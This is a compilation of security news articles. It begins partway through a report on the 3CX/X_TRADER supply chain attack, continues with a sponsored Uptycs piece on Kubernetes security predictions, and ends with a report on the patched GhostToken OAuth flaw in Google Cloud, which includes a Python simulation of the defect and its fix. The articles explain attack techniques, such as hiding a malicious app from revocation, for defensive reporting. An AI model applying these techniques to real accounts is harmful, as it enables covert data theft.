UNC4736 is suspected to be a threat group with North Korean nexus, an assessment that’s been reinforced by ESET’s discovery of an overlapping command-and-control (C2) domain (journalide[.]org) employed in the supply chain attack and that of a Lazarus Group campaign called Operation Dream Job.

Evidence gathered by Mandiant shows that the group exhibits commonalities with another intrusion set tracked as Operation AppleJeus, which has a track record of carrying out financially motivated attacks.

What’s more, the breach of Trading Technologies’ website is said to have taken place in early February 2022 to activate a multi-stage infection chain responsible for serving unknown payloads to the site visitors by weaponizing a then zero-day flaw in Google Chrome (CVE-2022-0609).

“The site www.tradingtechnologies[.]com was compromised and hosting a hidden IFRAME to exploit visitors, just two months before the site was known to deliver a trojanized X_TRADER software package,” Mandiant explained.

Another link connecting it to AppleJeus is the threat actor’s previous use of an older version of POOLRAT as part of a long-running campaign disseminating booby-trapped trading applications like CoinGoTrade to facilitate cryptocurrency theft.

The entire scale of the campaign remains unknown, and it’s currently not clear if the compromised X_TRADER software was used by other firms. The platform was purportedly decommissioned in April 2020, but it was still available to download from the site in 2022.

3CX, in an update shared on April 20, 2023, said it’s taking steps to harden its systems and minimize the risk of nested software-in-software supply chain attacks by enhancing product security, incorporating tools to ensure the integrity of its software, and establishing a new department for Network Operations and Security.

“Cascading software supply chain compromises demonstrate that North Korean operators can exploit network access in creative ways to develop and distribute malware, and move between target networks while conducting operations aligned with North Korea’s interests,” Mandiant said.

 

(c) Ravie Lakshmanan

14 Kubernetes and Cloud Security Challenges and How to Solve Them

Recently, Andrew Martin, founder and CEO of ControlPlane, released a report entitled Cloud Native and Kubernetes Security Predictions 2023. These predictions underscore the rapidly evolving landscape of Kubernetes and cloud security, emphasizing the need for organizations to stay informed and adopt comprehensive security solutions to protect their digital assets.

In response, Uptycs, the first unified CNAPP and XDR platform, released a whitepaper, “14 Kubernetes and Cloud Security Predictions for 2023 and How Uptycs Meets Them Head-On” addressing the most pressing challenges and trends in Kubernetes and cloud security for 2023. Uptycs explains how their unified CNAPP and XDR solution is designed to tackle these emerging challenges head-on.

Read on for key takeaways from the whitepaper and learn how Uptycs helps modern organizations successfully navigate the evolving landscape of Kubernetes and cloud security.

14 Kubernetes and Cloud Security Predictions for 2023

  1. CVEs continue to rampage and tear through the supply chain
  2. Kubernetes RBAC and security complexity continue to intensify
  3. Passwords and credentials will continue to be stolen as zero trust is slow to be adopted
  4. AI and machine learning (ML) will be harnessed by attackers more effectively than defenders
  5. eBPF technology powers all new connectivity, security, and observability projects
  6. CISOs will shoulder unjust legal responsibility, causing the talent shortage to be exacerbated
  7. Automated defensive remediation will continue to grow slowly
  8. Vulnerability exploitability eXchange (VEX) sees initial adoption
  9. Linux kernel ships its first Rust module
  10. Closed-source vendors face calls for SBOM delivery to derive mean time to remediation (MTTR) statistics
  11. Cybersecurity insurance policies will increasingly descope ransomware and negligence as governments increase fines
  12. Server-side WebAssembly tooling starts to proliferate after Docker’s alpha driver
  13. New legislation will continue to force standards that risk lack of real-world adoption or testing
  14. Confidential computing starts to be put through high-throughput test cases

As organizations navigate the complex landscape of Kubernetes and cloud security, it is important to stay informed and adopt the right solutions. Uptycs offers strategies for effectively addressing these concerns and maintaining a robust security posture. To gain a comprehensive understanding of the subject, download the Uptycs whitepaper, “14 Kubernetes and Cloud Security Predictions for 2023 and How Uptycs Meets Them Head-On.”

1. Addressing Supply Chain Security Concerns

The prediction that CVEs will continue to wreak havoc on supply chains emphasizes the importance of securing the software development lifecycle. Uptycs recognizes the need for robust vulnerability management and provides solutions for detecting and responding to threats in real-time. With Uptycs, organizations can identify and prioritize vulnerabilities, speeding up the mean time to detection (MTTD) and mean time to remediation (MTTR) of potential threats.

2. Tackling Kubernetes Security Complexity

As Kubernetes Role-Based Access Control (RBAC) and security complexity intensifies, organizations require better visibility and management tools. Uptycs offers a comprehensive Kubernetes Security Posture Management (KSPM) solution that provides clear visibility and control across Kubernetes clusters in various environments, such as Google GKE, AWS EKS, Azure AKS, Kubernetes, OpenShift, VMware Tanzu, and Google Anthos. This single solution streamlines security management and ensures a robust security posture.

3. Combatting Credential Theft and Slow Zero Trust Adoption

Credential theft remains a significant concern, and the slow adoption of zero-trust security models exacerbates this issue. Uptycs addresses these challenges by offering solutions such as Cloud Infrastructure Entitlements Management (CIEM), which provides a breakdown of cloud identity risk and governance based on identity types, credentials, activity, and control plane misconfigurations. With Uptycs, security teams can better protect their cloud resources and infrastructure from unauthorized access, misuse, and insider threats.

4. Harnessing AI and ML for Robust Security Measures

With the increasing use of AI and machine learning by attackers, organizations must leverage these technologies to enhance their defense strategies. Uptycs offers advanced threat detection and response capabilities that harness the power of AI and ML, providing the necessary context for analysts to quickly triage and investigate potential threats. By staying ahead of attackers in the AI and ML arms race, Uptycs helps organizations maintain a strong security posture.

5. Embracing eBPF Technology for Improved Connectivity, Security, and Observability

Uptycs predicts that eBPF technology will power new connectivity, security, and observability projects in 2023. As a cloud-native security platform, Uptycs leverages eBPF for deep telemetry collection and analysis, offering real-time visibility and threat detection across diverse environments. This adoption of cutting-edge technology ensures that Uptycs remains at the forefront of cloud and Kubernetes security.

6. Alleviating CISOs’ Legal Burden and the Talent Shortage

The whitepaper predicts that CISOs will continue to shoulder unjust legal responsibility, worsening the talent shortage in cybersecurity. Uptycs helps alleviate this burden by providing a unified platform that streamlines security management and consolidates various security functions. With Uptycs, organizations can reduce risk by prioritizing responses to threats, vulnerabilities, and compliance mandates across their modern attack surface from a single user interface.

7. Promoting Automated Defensive Remediation

Although automated defensive remediation is expected to grow slowly, Uptycs offers sophisticated remediation options, including actions like quarantine host, kill container, kill process, delete file, or run script. These actions can be configured for specific events, ensuring that organizations can efficiently respond to potential threats and maintain a strong security posture.

8. Supporting Vulnerability exploitability eXchange (VEX) Adoption

As the Vulnerability exploitability eXchange (VEX) sees initial adoption, Uptycs’ comprehensive vulnerability management solutions enable organizations to better identify, prioritize, and remediate vulnerabilities in their environments. This support for emerging standards ensures that Uptycs remains a leader in Kubernetes and cloud security.

9. Embracing Rust in Linux Kernel

With the Linux kernel shipping its first Rust module, Uptycs recognizes the importance of adapting to the evolving technological landscape. By staying abreast of the latest developments in programming languages and security technologies, Uptycs ensures that its solutions remain relevant and effective in a rapidly changing industry.

10. Addressing Closed-Source Vendor Concerns and SBOM Delivery

As closed-source vendors face calls for SBOM delivery to derive MTTR statistics, Uptycs’ open standards-based platform offers transparency and extensibility. This approach helps organizations maintain control over their security and IT data, avoiding reliance on black-box solutions and ensuring robust security measures.

11. Navigating the Changing Landscape of Cybersecurity Insurance

With cybersecurity insurance policies increasingly descoping ransomware and negligence as governments increase fines, organizations need comprehensive security solutions more than ever. Uptycs’ unified platform offers advanced threat detection, vulnerability management, and remediation capabilities, providing organizations with the tools they need to mitigate risks and protect their digital assets.

12. Supporting Server-Side WebAssembly Tooling Proliferation

As server-side WebAssembly tooling starts to proliferate after Docker’s alpha driver, Uptycs stays at the forefront of technological innovation, ensuring that its platform remains relevant and effective in addressing emerging security challenges.

13. Adapting to New Legislation and Standards

Uptycs recognizes the challenges posed by new legislation that forces standards, which risk a lack of real-world adoption or testing. By offering a comprehensive platform that covers hybrid cloud, containers, laptops, and servers, Uptycs enables organizations to adapt to evolving regulatory requirements and maintain a strong security posture.

14. Pioneering Confidential Computing

As confidential computing starts to be put through high-throughput test cases, Uptycs is well-positioned to embrace this emerging technology. By staying ahead of the curve and incorporating cutting-edge developments, Uptycs ensures that its platform remains a top choice for organizations seeking robust Kubernetes and cloud security solutions.

Uptycs: A Proactive Approach to Mastering Kubernetes and Cloud Security Challenges

Organizations that want to stay ahead of the curve and better protect their digital assets in the complex landscape of Kubernetes and cloud security should embrace the latest developments in technology and security.

Download the whitepaper now to learn how Uptycs’ unified CNAPP and XDR meets these challenges head-on, offering advanced solutions for threat detection, vulnerability management, remediation, and more.

Stay informed and watch Uptycs Cybersecurity Standup about The Future of Containers and Kubernetes Security. Uptycs hosts weekly LinkedIn Live Cybersecurity Standups every Thursday, where you can join in the conversation on this and other hot topics in the cybersecurity world.


(c) Ravie Lakshmanan

GhostToken Flaw Could Let Attackers Hide Malicious Apps in Google Cloud Platform

Cybersecurity researchers have disclosed details of a now-patched zero-day flaw in Google Cloud Platform (GCP) that could have enabled threat actors to conceal an unremovable, malicious application inside a victim’s Google account.

Dubbed GhostToken by Israeli cybersecurity startup Astrix Security, the shortcoming impacts all Google accounts, including enterprise-focused Workspace accounts. It was discovered and reported to Google on June 19, 2022. The company deployed a global patch more than nine months later, on April 7, 2023.

“The vulnerability […] allows attackers to gain permanent and unremovable access to a victim’s Google account by converting an already authorized third-party application into a malicious trojan app, leaving the victim’s personal data exposed forever,” Astrix said in a report.

In a nutshell, the flaw makes it possible for an attacker to hide their malicious app from a victim’s Google account application management page, thereby effectively preventing users from revoking its access.

This is achieved by deleting the GCP project associated with the authorized OAuth application, causing it to enter a “pending deletion” state. A threat actor with this capability could then unhide the rogue app by restoring the project, use the access token to obtain the victim’s data, and make the app invisible again.

[Image: Google Cloud Platform]

“In other words, the attacker holds a ‘ghost’ token to the victim’s account,” Astrix said.

The kind of data that can be accessed depends on the permissions granted to the app, which the adversaries can abuse to delete files from Google Drive, write emails on the victim’s behalf to perform social engineering attacks, track locations, and exfiltrate sensitive data from Google Calendar, Drive, Photos, and other apps.

“Victims may unknowingly authorize access to such malicious applications by installing a seemingly innocent app from the Google Marketplace or one of the many productivity tools available online,” Astrix added.

“Once the malicious app has been authorized, an attacker exploiting the vulnerability can bypass Google’s ‘Apps with access to your account’ management feature, which is the only place where Google users can view third-party apps connected to their account.”

Google’s patch addresses the problem by now also displaying apps that are in a pending deletion state on the third-party access page, allowing users to revoke the permission granted to such apps.
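To make the mechanism and the fix concrete, here is an added model of the grant lifecycle described above. It is constructed for this article and is not Google’s or Astrix’s code; the `Account` and `Grant` classes, the `patched` switch, and the app id `calendar-helper` are illustrative assumptions. It encodes the one property that matters for the defect: a grant that the management page does not list cannot be revoked, so if it can later become usable again, the user’s cleanup was ineffective. Listing pending-deletion grants (the patched behaviour) restores that property.

```python
"""Model of the GhostToken grant-lifecycle defect.

Constructed example for this article, not Google's or Astrix's code. A grant
whose GCP project is pending deletion was hidden from the user's third-party
access page, so it could not be revoked, yet restoring the project made the
grant usable again. The patched page lists such grants as well.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from enum import Enum


class ProjectState(Enum):
    ACTIVE = "active"
    PENDING_DELETION = "pending_deletion"


@dataclass
class Grant:
    """One third-party OAuth authorization on a user's account (model only)."""
    app_id: str
    project_state: ProjectState = ProjectState.ACTIVE
    revoked: bool = False

    def token_usable(self) -> bool:
        # The app's token works only while the grant is unrevoked and its
        # project is active; a pending-deletion project is dormant, not gone.
        return not self.revoked and self.project_state is ProjectState.ACTIVE


@dataclass
class Account:
    grants: dict[str, Grant] = field(default_factory=dict)

    def authorize(self, app_id: str) -> None:
        self.grants[app_id] = Grant(app_id)

    def set_project_state(self, app_id: str, state: ProjectState) -> None:
        # The app's owner, not the account owner, controls the project lifecycle.
        self.grants[app_id].project_state = state

    def visible_apps(self, patched: bool) -> list[str]:
        """What the 'Apps with access to your account' page lists.

        Pre-patch, grants whose project is pending deletion were filtered out;
        post-patch they are listed too, so the user can revoke them.
        """
        return sorted(
            g.app_id
            for g in self.grants.values()
            if not g.revoked
            and (patched or g.project_state is ProjectState.ACTIVE)
        )

    def revoke_all_visible(self, patched: bool) -> None:
        """The only revocation path the user has: revoke what the page shows."""
        for app_id in self.visible_apps(patched):
            self.grants[app_id].revoked = True


def ghost_survives_cleanup(patched: bool) -> bool:
    """Run the lifecycle the report describes and say whether the app's token
    is still usable after the user revoked everything the page showed.

    True means the grant is a 'ghost': hidden during cleanup, alive afterwards.
    """
    acct = Account()
    acct.authorize("calendar-helper")  # constructed app id
    # Project deleted: the grant drops off the (unpatched) management page.
    acct.set_project_state("calendar-helper", ProjectState.PENDING_DELETION)
    # User reviews the page and revokes every app it lists.
    acct.revoke_all_visible(patched)
    # Project restored by its owner.
    acct.set_project_state("calendar-helper", ProjectState.ACTIVE)
    return acct.grants["calendar-helper"].token_usable()


if __name__ == "__main__":
    for patched in (False, True):
        print(f"patched={patched}: ghost survives cleanup -> "
              f"{ghost_survives_cleanup(patched)}")
```

Running the script prints that the ghost survives the user’s cleanup only in the unpatched model. The same shape of check applies to any access-review UI: whatever the revocation page filters out of view is, by construction, something the user cannot revoke, so dormant or suspended states should still be listed.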

The development comes as Google Cloud fixed a privilege escalation flaw in the Cloud Asset Inventory API dubbed Asset Key Thief that could be exploited to steal user-managed Service Account private keys and gain access to valuable data. The issue, which was discovered by SADA earlier this February, was patched by the tech giant on March 14, 2023.

The findings also arrive a little over a month after cloud incident response firm Mitiga revealed that adversaries could take advantage of “insufficient” forensic visibility into GCP to exfiltrate sensitive data.


(c) Ravie Lakshmanan